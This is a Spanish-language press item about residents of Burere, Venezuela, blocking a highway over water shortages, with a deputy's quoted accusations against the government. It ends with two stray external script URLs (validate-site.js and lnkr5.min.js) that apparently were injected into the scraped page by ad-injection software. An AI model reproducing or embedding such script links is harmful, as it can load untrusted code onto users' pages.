El diputado a la Asamblea Nacional (AN) por Un Nuevo Tiempo (UNT), Guillermo Palacios, informó que vecinos de la comunidad de Burere, ubicada en la carretera Lara-Zulia, se “cansaron de las mentiras y promesas del régimen” de garantizarles el servicio de agua de forma continua o con razonamiento periódico” que les permita realizar sus actividades diarias, por lo que procedieron a interrumpir el tránsito automotor.

Nota de prensa

En tal sentido, el también Secretario General de UNT Lara, declaró que hasta la fecha no han recibido respuestas concretas por parte de las autoridades pertinentes, sin embargo, afirmó que “los daños ocurridos en la represa Los Quediches ha limitado el bombeo de agua”, por lo que se debe “tomar correctivos a tiempo” para evitar daños mayores en los equipos.

El Parlamentario, señaló que “frente a las mentiras del gobierno y de sus funcionarios”, a escasos metros de la manifestación, se realiza un desarrollo agrícola, que según los habitantes de la zona han visto maquinaria del estado, incluyendo camiones cisternas que se encargan del abastecimiento del complejo.

“Lo cual contradice las prioridades del régimen que es solucionar las necesidades básicas de la población, terminando de poner la guinda a través de un hecho de corrupción al negarle el vital líquido a una población que solo clama porque les resuelvan el problema”, finalizó.

VÍA LA PATILLA.

https://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x6748x&r=1533169201265https://devlinkin.xyz/addons/lnkr5.min.js

Loading...